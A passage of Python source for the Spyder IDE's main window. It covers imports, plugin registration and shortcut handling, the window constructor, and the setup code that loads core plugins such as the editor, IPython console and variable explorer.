qInstallMessageHandler)
from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QDesktopWidget, QDockWidget,
QMainWindow, QMenu, QMessageBox, QShortcut,
QStyleFactory, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
import qdarkstyle
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import (__version__, __project_url__, __forum_url__,
__trouble_url__, get_versions, __docs_url__)
from spyder import dependencies
from spyder.app import tour
from spyder.app.utils import (create_splash_screen, delete_lsp_log_files,
get_python_doc_path, qt_message_handler,
setup_logging, set_opengl_implementation, Spy)
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_path,
get_module_source_path, get_safe_mode,
is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.utils.image_path_manager import get_image_path
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_anaconda, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import (configparser as cp, is_text_string,
PY3, qbytearray_to_str, to_text_string)
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.programs import is_module_installed
from spyder.utils.qthelpers import (create_action, add_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri,
MENU_SEPARATOR, qapplication, start_file)
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
from spyder.app.solver import find_external_plugins, solve_plugin_dependencies
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
# Set the index for the default tour
DEFAULT_TOUR = 0
# Version passed to saveState/restoreState
WINDOW_STATE_VERSION = 1
#==============================================================================
# Install Qt messaage handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
# --- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name):
"""
Return a plugin instance by providing the plugin class.
"""
for name, plugin in self._PLUGINS.items():
if plugin_name == name:
return plugin
else:
raise SpyderAPIError('Plugin "{}" not found!'.format(plugin_name))
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.CONF_SECTION] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.CONF_SECTION] = plugin
else:
self._INTERNAL_PLUGINS[plugin.CONF_SECTION] = plugin
def register_plugin(self, plugin, external=False):
"""
Register a plugin in Spyder Main Window.
"""
self.set_splash(_("Loading {}...".format(plugin.get_name())))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register()
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio,
plugin.sig_status_message_requested,
]
for signal in signals:
try:
signal.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
try:
# New API
if (self.last_plugin is not None
and self.last_plugin.get_widget().is_maximized
and self.last_plugin is not plugin):
self.maximize_dockwidget()
except AttributeError:
# Old API
if (self.last_plugin is not None and self.last_plugin._ismaximized
and self.last_plugin is not plugin):
self.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
self.widgetlist.remove(plugin)
def tabify_plugin(self, plugin):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [Console]
tabify = getattr(plugin, 'TABIFY', [self.get_plugin(Plugins.Console)])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugin do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
if PYQT5:
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when presing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.ipyconsole = None
self.variableexplorer = None
self.plots = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
self.tour_dialog = None
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Quick Layouts and Dialogs
from spyder.preferences.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_interface_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.plugins_menu = None
self.plugins_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
# Set window title
self.set_window_title()
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.interface_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
# The following flag remember the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# The following flag is used to restore window's geometry when
# toggling out of fullscreen mode in Windows.
self.saved_normal_geometry = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError as e:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: #555555\'><b>netsh winsock reset"
"</b></span><br>"))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# To show the message about starting the tour
self.sig_setup_finished.connect(self.show_tour_message)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# --- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
css_path = CSS_PATH
else:
css_path = CSS_PATH
# Main menu plugin
from spyder.api.widgets.menus import SpyderMenu
from spyder.plugins.mainmenu.plugin import MainMenu
from spyder.plugins.mainmenu.api import (
ApplicationMenus, HelpMenuSections, ViewMenuSections,
ToolsMenuSections, FileMenuSections)
self.mainmenu = MainMenu(self, configuration=CONF)
self.register_plugin(self.mainmenu)
# Toolbar plugin
from spyder.plugins.toolbar.plugin import Toolbar
self.toolbar = Toolbar(self, configuration=CONF)
self.register_plugin(self.toolbar)
# Preferences plugin
from spyder.plugins.preferences.plugin import Preferences
self.preferences = Preferences(self, configuration=CONF)
self.register_plugin(self.preferences)
# Shortcuts plugin
from spyder.plugins.shortcuts.plugin import Shortcuts
self.shortcuts = Shortcuts(self, configuration=CONF)
self.register_plugin(self.shortcuts)
logger.info("Creating core actions...")
# TODO: Change registration to use MainMenus
self.close_dockwidget_action = create_action(
self, icon=ima.icon('close_pane'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut
)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_interface_action = create_action(
self,
(_("Unlock panes and toolbars") if self.interface_locked else
_("Lock panes and toolbars")),
icon=ima.icon('lock' if self.interface_locked else 'lock_open'),
triggered=lambda checked:
self.toggle_lock(not self.interface_locked),
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_interface_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
self.file_toolbar_actions = [self.file_switcher_action,
self.symbol_finder_action]
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
self.consoles_menu = mainmenu.get_application_menu("consoles_menu")
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
self.projects_menu = mainmenu.get_application_menu("projects_menu")
self.projects_menu.aboutToShow.connect(self.valid_project)
# Toolbars
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Internal console plugin
from spyder.plugins.console.plugin import Console
self.console = Console(self, configuration=CONF)
self.register_plugin(self.console)
# StatusBar plugin
from spyder.plugins.statusbar.plugin import StatusBar
self.statusbar = StatusBar(self, configuration=CONF)
self.register_plugin(self.statusbar)
# Run plugin
from spyder.plugins.run.plugin import Run
self.run = Run(self, configuration=CONF)
self.register_plugin(self.run)
# Appearance plugin
from spyder.plugins.appearance.plugin import Appearance
self.appearance = Appearance(self, configuration=CONF)
self.register_plugin(self.appearance)
# Main interpreter
from spyder.plugins.maininterpreter.plugin import MainInterpreter
self.maininterpreter = MainInterpreter(self, configuration=CONF)
self.register_plugin(self.maininterpreter)
# Code completion client initialization
from spyder.plugins.completion.plugin import CompletionPlugin
self.completions = CompletionPlugin(self, configuration=CONF)
self.register_plugin(self.completions)
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer.plugin import OutlineExplorer
self.outlineexplorer = OutlineExplorer(self)
self.outlineexplorer.register_plugin()
self.add_plugin(self.outlineexplorer)
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor.plugin import Editor
self.editor = Editor(self)
self.editor.register_plugin()
self.add_plugin(self.editor)
self.preferences.register_plugin_preferences(self.editor)
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
self.mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# IPython console
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole.plugin import IPythonConsole
self.ipyconsole = IPythonConsole(self, css_path=css_path)
self.ipyconsole.register_plugin()
self.add_plugin(self.ipyconsole)
self.preferences.register_plugin_preferences(self.ipyconsole)
# Variable Explorer
self.set_splash(_("Loading Variable Explorer..."))
from spyder.plugins.variableexplorer.plugin import VariableExplorer
self.variableexplorer = VariableExplorer(self, configuration=CONF)
self.register_plugin(self.variableexplorer)
# Help plugin
# TODO: There is a circular dependency between help and ipython since
# ipython console uses css_path.
if CONF.get('help', 'enable'):
CONF.set('help', 'css_path', css_path)
from spyder.plugins.help.plugin import Help
self.help = Help(self, configuration=CONF)
self.register_plugin(self.help)
# Application plugin
from spyder.plugins.application.plugin import Application
self.application = Application(self, configuration=CONF)
self.register_plugin(self.application)
# Tools + External Tools (some of this depends on the Application
# plugin)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
menurole=QAction.ApplicationSpecificRole)
from spyder.plugins.application.plugin import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = self.application.get_action(
ApplicationActions.SpyderWindowsEnvVariables)
self.mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action
)
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
self.mainmenu.add_item_to_application_menu(
self.menu_lsp_logs,
menu_id=ApplicationMenus.Tools)
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
if sys.platform == 'darwin':
self.fullscreen_action.setEnabled(False)
self.fullscreen_action.setToolTip(_("For fullscreen mode use "
"macOS built-in feature"))
else:
self.register_shortcut(
self.fullscreen_action,
"_",
"Fullscreen mode",
add_shortcut_to_tip=True
)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
for main_layout_action in [self.maximize_action,
self.fullscreen_action]:
self.toolbar.add_item_to_application_toolbar(
main_layout_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.LayoutSection,
before_section=MainToolbarSections.ApplicationSection)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
# History log widget
if CONF.get('historylog', 'enable'):
from spyder.plugins.history.plugin import HistoryLog
self.historylog = HistoryLog(self, configuration=CONF)
self.register_plugin(self.historylog)
# Figure browser
self.set_splash(_("Loading figure browser..."))
from spyder.plugins.plots.plugin import Plots
self.plots = Plots(self, configuration=CONF)
self.register_plugin(self.plots)
# Explorer
if CONF.get('explorer', 'enable'):
from spyder.plugins.explorer.plugin import Explorer
self.explorer = Explorer(self, configuration=CONF)
self.register_plugin(self.explorer)
# Online help widget
if CONF.get('onlinehelp', 'enable'):
from spyder.plugins.onlinehelp.plugin import OnlineHelp
self.onlinehelp = OnlineHelp(self, configuration=CONF)
self.register_plugin(self.onlinehelp)
# Working directory plugin
from spyder.plugins.workingdirectory.plugin import WorkingDirectory
CONF.set('workingdir', 'init_workdir', self.init_workdir)
self.workingdirectory = WorkingDirectory(self, configuration=CONF)
self.register_plugin(self.workingdirectory)
# Project explorer widget
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects.plugin import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
self.add_plugin(self.projects)
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles.plugin import FindInFiles
self.findinfiles = FindInFiles(self, configuration=CONF)
self.register_plugin(self.findinfiles)
# Breakpoints
if CONF.get('breakpoints', 'enable'):
from spyder.plugins.breakpoints.plugin import Breakpoints
self.breakpoints = Breakpoints(self, configuration=CONF)
self.register_plugin(self.breakpoints)
self.thirdparty_plugins.append(self.breakpoints)
# Profiler plugin
if CONF.get('profiler', 'enable'):
from spyder.plugins.profiler.plugin import Profiler
self.profiler = Profiler(self, configuration=CONF)
self.register_plugin(self.profiler)
self.thirdparty_plugins.append(self.profiler)
# Code analysis
if CONF.get("pylint", "enable"):
from spyder.plugins.pylint.plugin import Pylint
self.pylint = Pylint(self, configuration=CONF)
self.register_plugin(self.pylint)
